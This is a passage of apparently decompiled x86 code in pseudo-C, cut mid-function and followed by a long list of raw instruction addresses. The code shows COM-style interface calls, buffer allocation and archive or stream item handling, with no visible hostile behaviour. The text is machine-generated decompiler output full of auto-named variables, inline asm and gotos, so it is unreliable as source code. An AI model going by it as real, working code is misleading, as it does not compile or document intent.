													if(_t479 > 0x3fffffff) {
														_t479 = 0x3fffffff;
													}
													_t502 = _t479 << 2;
													__eflags = _t502;
													_push(_t502);
													_t778 = E004031DD();
													 *(_t790 + 0x1c) = _t778;
												}
												_t644 = 0;
												__eflags = _t614;
												if(_t614 <= 0) {
													L150:
													__eflags =  *(_t790 + 0x20);
													if( *(_t790 + 0x20) == 0) {
														E00403204(_t479, _t778);
														__eflags = _t765;
														 *(_t790 - 4) = 0xf;
														if(_t765 != 0) {
															 *((intOrPtr*)( *_t765 + 8))(_t765);
														}
														_t772 = 0x80004005;
														goto L171;
													}
													 *(_t790 + 0x30) = 0;
													__eflags =  *(_t790 + 0x24);
													 *(_t790 - 4) = 0x14;
													if( *(_t790 + 0x24) != 0) {
														_push(( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58))[0x18]);
														_t496 = E004080CE( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58));
														__eflags = _t496;
														if(_t496 == 0) {
															_push(0xc);
															_t497 = E004031DD();
															 *(_t790 + 0x14) = _t497;
															__eflags = _t497;
															 *(_t790 - 4) = 0x15;
															if(_t497 == 0) {
																_t498 = 0;
																__eflags = 0;
															} else {
																_push( *(_t790 + 0x24));
																_t498 = E0040CA28(_t497);
															}
															 *(_t790 - 4) = 0x14;
															E004063E5(_t790 + 0x30, _t498);
														}
													}
													 *(_t790 + 8) =  *(_t790 + 0x20);
													_t484 =  *(_t790 + 0x30);
													__eflags = _t484;
													if(_t484 == 0) {
														_t484 =  *(_t790 + 0x24);
													}
													_t615 =  *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 0x18))(_t778, _t790 + 8, _t484,  *(_t790 + 0x2c));
													_t487 =  *(_t790 + 0x30);
													__eflags = _t487;
													 *(_t790 - 4) = 0x13;
													if(_t487 != 0) {
														_t487 =  *((intOrPtr*)( *_t487 + 8))(_t487);
													}
													E00403204(_t487, _t778);
													__eflags = _t765;
													 *(_t790 - 4) = 0xf;
													if(_t765 != 0) {
														 *((intOrPtr*)( *_t765 + 8))(_t765);
													}
													 *(_t790 - 4) = 2;
													_t489 = E0040CE6F(_t790 - 0x70, _t765);
													 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
													E00403204(_t489,  *((intOrPtr*)(_t790 - 0x84)));
													E0040C85F(_t790 - 0xc4);
													 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
													E0040CDED(_t790 - 0x4c);
													_t461 = _t615;
													goto L174;
												} else {
													do {
														_t500 =  *((intOrPtr*)(_t790 - 0x70));
														_t479 =  *( *(_t500 + _t644 * 4));
														 *(_t778 + _t644 * 4) =  *( *(_t500 + _t644 * 4));
														_t644 = _t644 + 1;
														__eflags = _t644 - _t614;
													} while (_t644 < _t614);
													goto L150;
												}
											}
											_t765 = _t777;
											do {
												 *(_t790 + 0x1c) =  *(_t790 + 0x1c) & 0x00000000;
												_t616 =  *((intOrPtr*)(_t765 + 4));
												_t780 =  *_t765 +  *((intOrPtr*)(_t790 + 0xc));
												 *(_t790 - 4) = 0x12;
												asm("adc ebx, [ebp+0x10]");
												__eflags =  *(_t790 - 0x38) - 1;
												if( *(_t790 - 0x38) != 1) {
													_push(0x20);
													_t503 = E004031DD();
													__eflags = _t503;
													if(_t503 == 0) {
														_t350 = _t790 + 0x14;
														 *_t350 =  *(_t790 + 0x14) & 0x00000000;
														__eflags =  *_t350;
													} else {
														 *(_t503 + 4) =  *(_t503 + 4) & 0x00000000;
														 *(_t503 + 0x18) =  *(_t503 + 0x18) & 0x00000000;
														 *_t503 = 0x41bbfc;
														 *(_t790 + 0x14) = _t503;
													}
													E004063E5(_t790 + 0x1c,  *(_t790 + 0x14));
													_t356 =  *(_t790 + 0x14) + 0x18; // 0x18
													E004063E5(_t356,  *(_t790 + 0x30));
													_t507 =  *(_t790 + 0x14);
													 *((intOrPtr*)(_t507 + 0x10)) = _t780;
													 *(_t507 + 8) =  *(_t790 + 0x30);
													 *((intOrPtr*)(_t507 + 0x14)) = _t616;
													goto L137;
												}
												_t516 =  *(_t790 + 8);
												_t772 =  *((intOrPtr*)( *_t516 + 0x10))(_t516, _t780, _t616, 0, 0);
												__eflags = _t772;
												if(_t772 != 0) {
													_t518 =  *(_t790 + 0x1c);
													 *(_t790 - 4) = 0x11;
													__eflags = _t518;
													if(_t518 != 0) {
														 *((intOrPtr*)( *_t518 + 8))(_t518);
													}
													_t519 =  *(_t790 + 0x30);
													 *(_t790 - 4) = 0xf;
													__eflags = _t519;
													if(_t519 != 0) {
														 *((intOrPtr*)( *_t519 + 8))(_t519);
													}
													goto L171;
												}
												E004063E5(_t790 + 0x1c,  *(_t790 + 8));
												L137:
												_push(0x28);
												_t508 = E004031DD();
												__eflags = _t508;
												if(_t508 == 0) {
													_t781 = 0;
													__eflags = 0;
												} else {
													 *((intOrPtr*)(_t508 + 4)) = 0;
													 *((intOrPtr*)(_t508 + 8)) = 0;
													 *_t508 = 0x41bbec;
													_t781 = _t508;
												}
												E004063E5(E0040895D(_t790 - 0x70), _t781);
												_t366 = _t781 + 8; // 0x8
												E004063E5(_t366,  *(_t790 + 0x1c));
												 *(_t790 - 4) = 0x11;
												asm("sbb ecx, [edi+0x4]");
												 *(_t781 + 0x20) =  *(_t781 + 0x20) & 0x00000000;
												 *((intOrPtr*)(_t781 + 0x10)) =  *(_t765 + 8) -  *_t765;
												 *((intOrPtr*)(_t781 + 0x18)) = 0;
												 *((intOrPtr*)(_t781 + 0x14)) =  *((intOrPtr*)(_t765 + 0xc));
												 *((intOrPtr*)(_t781 + 0x1c)) = 0;
												_t514 =  *(_t790 + 0x1c);
												__eflags = _t514;
												if(_t514 != 0) {
													 *((intOrPtr*)( *_t514 + 8))(_t514);
												}
												 *(_t790 + 0x18) =  *(_t790 + 0x18) + 1;
												_t765 = _t765 + 8;
												__eflags =  *(_t790 + 0x18) -  *(_t790 - 0x38);
											} while ( *(_t790 + 0x18) <  *(_t790 - 0x38));
											_t765 =  *(_t790 + 0x30);
											goto L144;
										} else {
											asm("adc edx, [ebp+0x10]");
											_t765 =  *((intOrPtr*)( *_t613 + 0x10))(_t613,  *_t777 +  *((intOrPtr*)(_t790 + 0xc)),  *((intOrPtr*)(_t777 + 4)), 0,  *(_t790 + 0x30) + 0x10);
											__eflags = _t765;
											if(_t765 == 0) {
												E004063E5( *(_t790 + 0x30) + 8, _t613);
												_t765 =  *(_t790 + 0x30);
												goto L128;
											}
											_t528 =  *(_t790 + 0x30);
											 *(_t790 - 4) = 0xf;
											__eflags = _t528;
											if(_t528 != 0) {
												 *((intOrPtr*)( *_t528 + 8))(_t528);
											}
											_t772 = _t765;
											L171:
											 *(_t790 - 4) = 2;
											_t457 = E0040CE6F(_t790 - 0x70, _t765);
											goto L172;
										}
									}
									_t536 = _t477 << 3;
									__eflags = _t536;
									 *((intOrPtr*)(_t790 - 0x54)) = 0;
									 *(_t790 - 0x50) = _t536;
									do {
										_t782 =  *((intOrPtr*)(_t790 - 0x54)) +  *((intOrPtr*)(_t790 - 0x4c));
										 *(_t790 - 0x24) = _t782;
										_t540 =  *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 8))( *((intOrPtr*)(_t790 - 0x1c)));
										_t685 =  *_t540;
										__eflags = _t685;
										_t766 = _t685;
										if(_t685 == 0) {
											_t766 = _t540[1];
										}
										__eflags =  *(_t790 + 0x1b);
										if( *(_t790 + 0x1b) != 0) {
											L52:
											 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
											 *(_t790 - 4) = 0xb;
											 *((intOrPtr*)( *_t766))(_t766, 0x41b300, _t790 - 0x10);
											_t457 =  *(_t790 - 0x10);
											__eflags = _t457;
											if(_t457 == 0) {
												L58:
												__eflags = _t457;
												 *(_t790 - 4) = 2;
												if(_t457 != 0) {
													 *((intOrPtr*)( *_t457 + 8))(_t457);
												}
												 *(_t790 - 0x74) =  *(_t790 - 0x74) & 0x00000000;
												 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
												 *(_t790 - 4) = 0xc;
												 *((intOrPtr*)( *_t766))(_t766, 0x41b2d0, _t790 - 0x10);
												_t767 =  *(_t790 - 0x10);
												__eflags = _t767;
												if(_t767 == 0) {
													L63:
													__eflags = _t767;
													 *(_t790 - 4) = 2;
													if(_t767 != 0) {
														 *((intOrPtr*)( *_t767 + 8))(_t767);
													}
													_t783 =  *(_t782 + 0x10);
													 *(_t790 - 0x18) =  *(_t790 - 0x18) & 0x00000000;
													__eflags = _t783;
													 *(_t790 - 0x28) = _t783;
													if(_t783 != 0) {
														_t562 = 0x1fffffff;
														__eflags = _t783 - 0x1fffffff;
														if(_t783 <= 0x1fffffff) {
															_t562 = _t783;
														}
														_t563 = _t562 << 3;
														__eflags = _t563;
														_push(_t563);
														 *(_t790 - 0x18) = E004031DD();
													}
													 *(_t790 - 0x20) =  *(_t790 - 0x20) & 0x00000000;
													 *(_t790 - 4) = 0xd;
													__eflags = _t783;
													if(_t783 != 0) {
														_t559 = 0x3fffffff;
														__eflags = _t783 - 0x3fffffff;
														if(_t783 <= 0x3fffffff) {
															_t559 = _t783;
														}
														_t560 = _t559 << 2;
														__eflags = _t560;
														_push(_t560);
														 *(_t790 - 0x20) = E004031DD();
													}
													 *(_t790 - 0x24) =  *(_t790 - 0x24) & 0x00000000;
													 *(_t790 - 4) = 0xe;
													__eflags = _t783;
													if(_t783 <= 0) {
														L96:
														_t545 =  *(_t790 + 0x1c);
														__eflags = _t545;
														if(_t545 == 0) {
															L98:
															_t545 =  *((intOrPtr*)(_t610 + 0x28)) +  *(_t790 - 0x50);
															__eflags = _t545;
															goto L99;
														}
														__eflags =  *((intOrPtr*)(_t790 - 0x1c)) -  *((intOrPtr*)(_t790 - 0xa0));
														if( *((intOrPtr*)(_t790 - 0x1c)) ==  *((intOrPtr*)(_t790 - 0xa0))) {
															goto L99;
														}
														goto L98;
													} else {
														_t768 =  *(_t790 - 0x18);
														_t784 =  *(_t790 - 0x2c);
														 *(_t790 - 0x10) =  *(_t790 - 0x20);
														do {
															_t752 =  *((intOrPtr*)(_t790 - 0x44));
															_t694 = 0;
															__eflags =  *(_t790 - 0x40);
															if( *(_t790 - 0x40) <= 0) {
																L85:
																_t694 = _t694 | 0xffffffff;
																__eflags = _t694;
																L86:
																__eflags = _t694;
																if(_t694 < 0) {
																	_t552 = 0;
																	__eflags =  *(_t790 - 0x38);
																	if( *(_t790 - 0x38) <= 0) {
																		L92:
																		_t552 = _t552 | 0xffffffff;
																		__eflags = _t552;
																		L93:
																		__eflags = _t552;
																		if(_t552 < 0) {
																			_t457 = E00403204(E00403204(_t552,  *(_t790 - 0x20)),  *(_t790 - 0x18));
																			goto L118;
																		}
																		_t698 =  *((intOrPtr*)(_t784 + 8 + _t552 * 8)) -  *((intOrPtr*)(_t784 + _t552 * 8));
																		__eflags = _t698;
																		asm("sbb edx, [esi+eax*8+0x4]");
																		 *_t768 = _t698;
																		 *((intOrPtr*)(_t768 + 4)) =  *((intOrPtr*)(_t784 + 0xc + _t552 * 8));
																		 *( *(_t790 - 0x10)) = _t768;
																		goto L95;
																	}
																	_t699 =  *((intOrPtr*)(_t790 - 0x3c));
																	while(1) {
																		__eflags =  *_t699 -  *((intOrPtr*)(_t790 - 0x30));
																		if( *_t699 ==  *((intOrPtr*)(_t790 - 0x30))) {
																			goto L93;
																		}
																		_t552 = _t552 + 1;
																		_t699 = _t699 + 4;
																		__eflags = _t552 -  *(_t790 - 0x38);
																		if(_t552 <  *(_t790 - 0x38)) {
																			continue;
																		}
																		goto L92;
																	}
																	goto L93;
																}
																 *( *(_t790 - 0x10)) =  *((intOrPtr*)(_t610 + 0x28)) + ( *((intOrPtr*)(_t752 + 4 + _t694 * 8)) +  *(_t790 - 0x78)) * 8;
																goto L95;
															}
															_t558 = _t752;
															while(1) {
																__eflags =  *_t558 -  *((intOrPtr*)(_t790 - 0x30));
																if( *_t558 ==  *((intOrPtr*)(_t790 - 0x30))) {
																	break;
																}
																_t694 = _t694 + 1;
																_t558 = _t558 + 8;
																__eflags = _t694 -  *(_t790 - 0x40);
																if(_t694 <  *(_t790 - 0x40)) {
																	continue;
																}
																_t784 =  *(_t790 - 0x2c);
																goto L85;
															}
															_t784 =  *(_t790 - 0x2c);
															goto L86;
															L95:
															 *(_t790 - 0x24) =  *(_t790 - 0x24) + 1;
															 *(_t790 - 0x10) =  *(_t790 - 0x10) + 4;
															_t768 = _t768 + 8;
															 *((intOrPtr*)(_t790 - 0x30)) =  *((intOrPtr*)(_t790 - 0x30)) + 1;
															__eflags =  *(_t790 - 0x24) -  *(_t790 - 0x28);
														} while ( *(_t790 - 0x24) <  *(_t790 - 0x28));
														goto L96;
													}
												} else {
													_t567 =  *(_t790 + 0x17);
													 *(_t790 - 0x74) = _t567;
													__eflags = _t567;
													_t769 =  *((intOrPtr*)( *_t767 + 0xc))(_t767, 0 | _t567 != 0x00000000);
													__eflags = _t769;
													if(_t769 != 0) {
														_t569 =  *(_t790 - 0x10);
														 *(_t790 - 4) = 2;
														__eflags = _t569;
														if(_t569 != 0) {
															_t569 =  *((intOrPtr*)( *_t569 + 8))(_t569);
														}
														 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
														E00403204(_t569,  *((intOrPtr*)(_t790 - 0x84)));
														E0040C85F(_t790 - 0xc4);
														 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
														E0040CDED(_t790 - 0x4c);
														_t461 = _t769;
														goto L174;
													}
													_t767 =  *(_t790 - 0x10);
													goto L63;
												}
											}
											_t757 =  *((intOrPtr*)(_t782 + 0xc));
											__eflags = _t757 - 0xffffffff;
											if(_t757 > 0xffffffff) {
												__eflags = _t457;
												 *(_t790 - 4) = 2;
												if(_t457 != 0) {
													_t457 =  *((intOrPtr*)( *_t457 + 8))(_t457);
												}
												goto L118;
											}
											_t772 =  *((intOrPtr*)( *_t457 + 0xc))(_t457,  *((intOrPtr*)(_t782 + 8)), _t757);
											__eflags = _t772 - 0x80070057;
											if(_t772 == 0x80070057) {
												_t772 = 0x80004001;
											}
											__eflags = _t772;
											if(_t772 != 0) {
												_t457 =  *(_t790 - 0x10);
												 *(_t790 - 4) = 2;
												__eflags = _t457;
												if(_t457 != 0) {
													_t457 =  *((intOrPtr*)( *_t457 + 8))(_t457);
												}
												goto L172;
											} else {
												_t457 =  *(_t790 - 0x10);
												_t782 =  *(_t790 - 0x24);
												goto L58;
											}
										} else {
											__eflags =  *(_t790 + 0x30);
											if( *(_t790 + 0x30) == 0) {
												L47:
												 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
												 *(_t790 - 4) = 0xa;
												 *((intOrPtr*)( *_t766))(_t766, 0x41b2b0, _t790 - 0x10);
												_t577 =  *(_t790 - 0x10);
												__eflags = _t577;
												if(_t577 == 0) {
													L50:
													__eflags = _t577;
													 *(_t790 - 4) = 2;
													if(_t577 != 0) {
														 *((intOrPtr*)( *_t577 + 8))(_t577);
													}
													goto L52;
												}
												 *(_t790 + 0x1b) = 1;
												_t579 =  *((intOrPtr*)( *_t577 + 0xc))(_t577,  *((intOrPtr*)(_t790 + 0x38)),  *((intOrPtr*)(_t790 + 0x3c)));
												__eflags = _t579;
												 *(_t790 - 0x28) = _t579;
												if(_t579 != 0) {
													_t580 =  *(_t790 - 0x10);
													 *(_t790 - 4) = 2;
													__eflags = _t580;
													if(_t580 != 0) {
														_t580 =  *((intOrPtr*)( *_t580 + 8))(_t580);
													}
													 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
													E00403204(_t580,  *((intOrPtr*)(_t790 - 0x84)));
													E0040C85F(_t790 - 0xc4);
													 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
													E0040CDED(_t790 - 0x4c);
													_t461 =  *(_t790 - 0x28);
													goto L174;
												}
												_t577 =  *(_t790 - 0x10);
												goto L50;
											}
											 *(_t790 - 0x10) =  *(_t790 - 0x10) & 0x00000000;
											 *(_t790 - 4) = 9;
											 *((intOrPtr*)( *_t766))(_t766, 0x41b2e0, _t790 - 0x10);
											_t586 =  *(_t790 - 0x10);
											__eflags = _t586;
											if(_t586 == 0) {
												L45:
												__eflags = _t586;
												 *(_t790 - 4) = 2;
												if(_t586 != 0) {
													 *((intOrPtr*)( *_t586 + 8))(_t586);
												}
												goto L47;
											}
											 *(_t790 + 0x1b) = 1;
											_t588 =  *((intOrPtr*)( *_t586 + 0xc))(_t586,  *(_t790 + 0x34));
											__eflags = _t588;
											 *(_t790 - 0x28) = _t588;
											if(_t588 != 0) {
												_t589 =  *(_t790 - 0x10);
												 *(_t790 - 4) = 2;
												__eflags = _t589;
												if(_t589 != 0) {
													_t589 =  *((intOrPtr*)( *_t589 + 8))(_t589);
												}
												 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
												E00403204(_t589,  *((intOrPtr*)(_t790 - 0x84)));
												E0040C85F(_t790 - 0xc4);
												 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
												E0040CDED(_t790 - 0x4c);
												_t461 =  *(_t790 - 0x28);
												goto L174;
											}
											_t586 =  *(_t790 - 0x10);
											goto L45;
										}
										L99:
										_t747 =  *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58));
										_t548 = E00403204( *((intOrPtr*)(_t747 + 0x14))( *((intOrPtr*)(_t790 - 0x1c)), _t545,  *(_t790 - 0x20),  *(_t790 - 0x74)),  *(_t790 - 0x20));
										 *(_t790 - 4) = 2;
										E00403204(_t548,  *(_t790 - 0x18));
										 *((intOrPtr*)(_t790 - 0x1c)) =  *((intOrPtr*)(_t790 - 0x1c)) + 1;
										 *(_t790 - 0x50) =  *(_t790 - 0x50) + 8;
										 *((intOrPtr*)(_t790 - 0x54)) =  *((intOrPtr*)(_t790 - 0x54)) + 0x18;
										__eflags =  *((intOrPtr*)(_t790 - 0x1c)) -  *(_t790 - 0x48);
									} while ( *((intOrPtr*)(_t790 - 0x1c)) <  *(_t790 - 0x48));
									goto L100;
								}
								 *(_t790 + 0x18) = 0;
								while(1) {
									 *(_t790 - 0x64) =  *(_t790 - 0x64) & 0x00000000;
									 *(_t790 - 0x60) =  *(_t790 - 0x60) & 0x00000000;
									_t787 =  *(_t790 + 0x18) +  *((intOrPtr*)(_t790 - 0x4c));
									_push( *((intOrPtr*)(_t787 + 4)));
									 *(_t790 - 4) = 4;
									_push( *_t787);
									_t594 = E00406310(0, _t790 - 0x64, __eflags);
									__eflags = _t594;
									if(_t594 != 0) {
										break;
									}
									_t788 =  *((intOrPtr*)(_t787 + 0x10));
									__eflags = _t788 - 1;
									if(_t788 != 1) {
										__eflags =  *(_t790 - 0x60);
										if( *(_t790 - 0x60) == 0) {
											L83:
											 *(_t790 - 4) = 7;
											E0040B44C(_t790 - 0x60);
											 *(_t790 - 4) = 2;
											_t597 = E0040B44C(_t790 - 0x64);
											 *(_t790 - 4) =  *(_t790 - 4) & 0x00000000;
											E00403204(_t597,  *((intOrPtr*)(_t790 - 0x84)));
											E0040C85F(_t790 - 0xc4);
											 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
											E0040CDED(_t790 - 0x4c);
											_t461 = 0x80004001;
											goto L174;
										}
										__eflags =  *((intOrPtr*)(_t790 - 0x58)) - _t788;
										if( *((intOrPtr*)(_t790 - 0x58)) != _t788) {
											goto L83;
										}
										L33:
										_t747 = _t790 - 0x64;
										 *((intOrPtr*)( *( *( *((intOrPtr*)(_t790 - 0x14)) + 0x58)) + 4))(_t747);
										 *(_t790 - 4) = 8;
										E0040B44C(_t790 - 0x60);
										 *(_t790 - 4) = 2;
										E0040B44C(_t790 - 0x64);
										 *(_t790 - 0x18) =  *(_t790 - 0x18) + 1;
										 *(_t790 + 0x18) =  *(_t790 + 0x18) + 0x18;
										__eflags =  *(_t790 - 0x18) -  *(_t790 - 0x48);
										if(__eflags < 0) {
											continue;
										}
										_t776 =  *((intOrPtr*)(_t790 - 0x14));
										goto L35;
									}
									__eflags =  *(_t790 - 0x64) - _t594;
									if( *(_t790 - 0x64) == _t594) {
										 *(_t790 - 4) = 6;
										_t772 = 0x80004001;
										L82:
										E0040B44C(_t790 - 0x60);
										 *(_t790 - 4) = 2;
										_t457 = E0040B44C(_t790 - 0x64);
										goto L172;
									}
									goto L33;
								}
								 *(_t790 - 4) = 5;
								_t772 = _t594;
								goto L82;
							} else {
								_t772 = _t457;
								goto L172;
							}
						}
						_t747 = _t774 + 4;
						_t608 = E0040CBF8(_t790 - 0xc4, _t747);
						__eflags = _t608;
						if(_t608 != 0) {
							goto L36;
						}
						goto L15;
					}
					_t759 =  *(_t790 + 0x1c);
					_t789 =  *_t759;
					_t760 =  *((intOrPtr*)(_t759 + 4));
					__eflags = _t760 - _t457;
					if(__eflags < 0) {
						__eflags = _t789 - _t632;
						L9:
						if(__eflags != 0) {
							L12:
							_t41 = _t790 + 0x17;
							 *_t41 =  *(_t790 + 0x17) & 0x00000000;
							__eflags =  *_t41;
							goto L13;
						}
						__eflags = _t760 - _t457;
						if(_t760 != _t457) {
							goto L12;
						} else {
							 *(_t790 + 0x17) = 1;
							goto L13;
						}
					}
					if(__eflags > 0) {
						L7:
						_t772 = 0x80004005;
						goto L172;
					}
					__eflags = _t789 - _t632;
					if(__eflags <= 0) {
						goto L9;
					}
					goto L7;
				} else {
					_t772 = 0x80004001;
					L173:
					 *(_t790 - 4) =  *(_t790 - 4) | 0xffffffff;
					E0040CDED(_t790 - 0x4c);
					_t461 = _t772;
					L174:
					 *[fs:0x0] =  *((intOrPtr*)(_t790 - 0xc));
					return _t461;
				}
			}

0x0040bd85
0x0040bd8a
0x0040bd99
0x0040bd9d
0x0040bda0
0x0040bda7
0x0040bdaf
0x0040bdbb
0x0040bdbe
0x0040bdc3
0x0040bdce
0x0040bdde
0x0040bde1
0x0040bdf3
0x0040bdfe
0x0040be02
0x0040be10
0x0040be14
0x0040be1f
0x0040be24
0x0040be26
0x0040c494
0x0040c494
0x0040c789
0x0040c78f
0x0040c78f
0x0040c78f
0x0040c793
0x0040c79f
0x00000000
0x0040c79f
0x0040be32
0x0040be35
0x0040be3d
0x0040be40
0x0040be44
0x0040be47
0x0040be4b
0x0040be7b
0x0040be7b
0x0040be7e
0x0040be81
0x0040be99
0x0040be99
0x0040be9c
0x0040be9f
0x0040bea2
0x0040bea4
0x0040bea9
0x0040beac
0x0040beac
0x0040beac
0x0040beaf
0x0040beb4
0x0040beba
0x0040bebd
0x0040bebf
0x0040bec3
0x0040bed0
0x0040bed0
0x0040bec5
0x0040bec9
0x0040bec9
0x0040bed6
0x0040beda
0x0040bedf
0x0040bee7
0x0040beea
0x0040beec
0x0040bef3
0x0040bef3
0x0040beee
0x0040beee
0x0040beee
0x0040bef5
0x0040bef8
0x0040beff
0x0040bf04
0x0040bf08
0x0040bf0a
0x0040bf13
0x0040bf16
0x0040bf19
0x0040bfb1
0x0040bfbb
0x0040bfca
0x0040bfcf
0x0040bfd2
0x0040bfd5
0x0040bfda
0x0040bfe2
0x0040bfe5
0x0040bfe8
0x0040bfeb
0x0040bfee
0x0040bff1
0x0040bff4
0x0040c34b
0x0040c34b
0x0040c350
0x0040c353
0x0040c358
0x0040c35e
0x0040c35e
0x0040c364
0x0040c364
0x0040c367
0x0040c36a
0x0040c36d
0x0040c370
0x0040c372
0x0040c376
0x0040c37c
0x0040c37f
0x0040c381
0x0040c385
0x0040c49e
0x0040c49e
0x0040c38b
0x0040c392
0x0040c392
0x0040c4a0
0x0040c4a2
0x0040c4a5
0x0040c4a9
0x0040c4ac
0x0040c4b1
0x0040c4b1
0x0040c4b4
0x0040c4b8
0x0040c4bb
0x0040c4bf
0x0040c50a
0x0040c50a
0x0040c50e
0x0040c512
0x0040c620
0x0040c620
0x0040c623
0x0040c625
0x0040c627
0x0040c629
0x0040c62c
0x0040c633
0x0040c635
0x0040c637
0x0040c637
0x0040c639
0x0040c639
0x0040c63c
0x0040c642
0x0040c645
0x0040c645
0x0040c64a
0x0040c64c
0x0040c64e
0x0040c660
0x0040c660
0x0040c663
0x0040c764
0x0040c769
0x0040c76c
0x0040c770
0x0040c775
0x0040c775
0x0040c778
0x00000000
0x0040c778
0x0040c669
0x0040c66c
0x0040c66f
0x0040c673
0x0040c67b
0x0040c67e
0x0040c683
0x0040c685
0x0040c687
0x0040c689
0x0040c68f
0x0040c692
0x0040c694
0x0040c698
0x0040c6d1
0x0040c6d1
0x0040c69a
0x0040c69a
0x0040c69f
0x0040c69f
0x0040c6d7
0x0040c6db
0x0040c6db
0x0040c685
0x0040c6e3
0x0040c6e6
0x0040c6e9
0x0040c6eb
0x0040c6ed
0x0040c6ed
0x0040c704
0x0040c706
0x0040c709
0x0040c70b
0x0040c70f
0x0040c714
0x0040c714
0x0040c718
0x0040c71d
0x0040c720
0x0040c724
0x0040c729
0x0040c729
0x0040c72f
0x0040c733
0x0040c73e
0x0040c742
0x0040c74e
0x0040c753
0x0040c75a
0x0040c75f
0x00000000
0x0040c650
0x0040c650
0x0040c650
0x0040c656
0x0040c658
0x0040c65b
0x0040c65c
0x0040c65c
0x00000000
0x0040c650
0x0040c64e
0x0040c518
0x0040c51a
0x0040c51a
0x0040c520
0x0040c523
0x0040c526
0x0040c52a
0x0040c52d
0x0040c531
0x0040c559
0x0040c55b
0x0040c560
0x0040c563
0x0040c578
0x0040c578
0x0040c578
0x0040c565
0x0040c565
0x0040c569
0x0040c56d
0x0040c573
0x0040c573
0x0040c582
0x0040c58d
0x0040c590
0x0040c595
0x0040c59b
0x0040c59e
0x0040c5a1
0x00000000
0x0040c5a1
0x0040c533
0x0040c542
0x0040c544
0x0040c546
0x0040c6a6
0x0040c6a9
0x0040c6ad
0x0040c6af
0x0040c6b4
0x0040c6b4
0x0040c6b7
0x0040c6ba
0x0040c6be
0x0040c6c0
0x0040c6c9
0x0040c6c9
0x00000000
0x0040c6c0
0x0040c552
0x0040c5a4
0x0040c5a4
0x0040c5a6
0x0040c5ae
0x0040c5b0
0x0040c5c2
0x0040c5c2
0x0040c5b2
0x0040c5b2
0x0040c5b5
0x0040c5b8
0x0040c5be
0x0040c5be
0x0040c5cf
0x0040c5d7
0x0040c5da
0x0040c5e7
0x0040c5eb
0x0040c5ee
0x0040c5f2
0x0040c5f5
0x0040c5f8
0x0040c5fb
0x0040c5fe
0x0040c601
0x0040c603
0x0040c608
0x0040c608
0x0040c60b
0x0040c611
0x0040c614
0x0040c614
0x0040c61d
0x00000000
0x0040c4c1
0x0040c4d4
0x0040c4dd
0x0040c4df
0x0040c4e1
0x0040c502
0x0040c507
0x00000000
0x0040c507
0x0040c4e3
0x0040c4e6
0x0040c4ea
0x0040c4ec
0x0040c4f1
0x0040c4f1
0x0040c4f4
0x0040c77d
0x0040c780
0x0040c784
0x00000000
0x0040c784
0x0040c4bf
0x0040bffa
0x0040bffa
0x0040bffd
0x0040c000
0x0040c003
0x0040c00c
0x0040c012
0x0040c01a
0x0040c01d
0x0040c01f
0x0040c021
0x0040c023
0x0040c025
0x0040c025
0x0040c028
0x0040c02c
0x0040c0c7
0x0040c0c7
0x0040c0d7
0x0040c0db
0x0040c0dd
0x0040c0e0
0x0040c0e2
0x0040c118
0x0040c118
0x0040c11a
0x0040c11e
0x0040c123
0x0040c123
0x0040c126
0x0040c12a
0x0040c13a
0x0040c13e
0x0040c140
0x0040c143
0x0040c145
0x0040c168
0x0040c168
0x0040c16a
0x0040c16e
0x0040c173
0x0040c173
0x0040c176
0x0040c179
0x0040c17d
0x0040c17f
0x0040c182
0x0040c184
0x0040c189
0x0040c18b
0x0040c18d
0x0040c18d
0x0040c18f
0x0040c18f
0x0040c192
0x0040c199
0x0040c199
0x0040c19c
0x0040c1a0
0x0040c1a4
0x0040c1a6
0x0040c1a8
0x0040c1ad
0x0040c1af
0x0040c1b1
0x0040c1b1
0x0040c1b3
0x0040c1b3
0x0040c1b6
0x0040c1bd
0x0040c1bd
0x0040c1c0
0x0040c1c4
0x0040c1c8
0x0040c1ca
0x0040c2ef
0x0040c2ef
0x0040c2f2
0x0040c2f4
0x0040c301
0x0040c307
0x0040c307
0x00000000
0x0040c307
0x0040c2f9
0x0040c2ff
0x00000000
0x00000000
0x00000000
0x0040c1d0
0x0040c1d3
0x0040c1d6
0x0040c1d9
0x0040c1dc
0x0040c1dc
0x0040c1df
0x0040c1e1
0x0040c1e4
0x0040c27d
0x0040c27d
0x0040c27d
0x0040c280
0x0040c280
0x0040c282
0x0040c298
0x0040c29a
0x0040c29d
0x0040c2b2
0x0040c2b2
0x0040c2b2
0x0040c2b5
0x0040c2b5
0x0040c2b7
0x0040c48d
0x00000000
0x0040c493
0x0040c2c5
0x0040c2c5
0x0040c2c8
0x0040c2cf
0x0040c2d1
0x0040c2d4
0x00000000
0x0040c2d4
0x0040c29f
0x0040c2a2
0x0040c2a5
0x0040c2a7
0x00000000
0x00000000
0x0040c2a9
0x0040c2aa
0x0040c2ad
0x0040c2b0
0x00000000
0x00000000
0x00000000
0x0040c2b0
0x00000000
0x0040c2a2
0x0040c294
0x00000000
0x0040c294
0x0040c1ea
0x0040c1ec
0x0040c1ee
0x0040c1f1
0x00000000
0x00000000
0x0040c1f7
0x0040c1f8
0x0040c1fb
0x0040c1fe
0x00000000
0x00000000
0x0040c200
0x00000000
0x0040c200
0x0040c278
0x00000000
0x0040c2d6
0x0040c2d6
0x0040c2d9
0x0040c2e0
0x0040c2e3
0x0040c2e6
0x0040c2e6
0x00000000
0x0040c1dc
0x0040c147
0x0040c147
0x0040c14e
0x0040c151
0x0040c15b
0x0040c15d
0x0040c15f
0x0040c443
0x0040c446
0x0040c44a
0x0040c44c
0x0040c451
0x0040c451
0x0040c45a
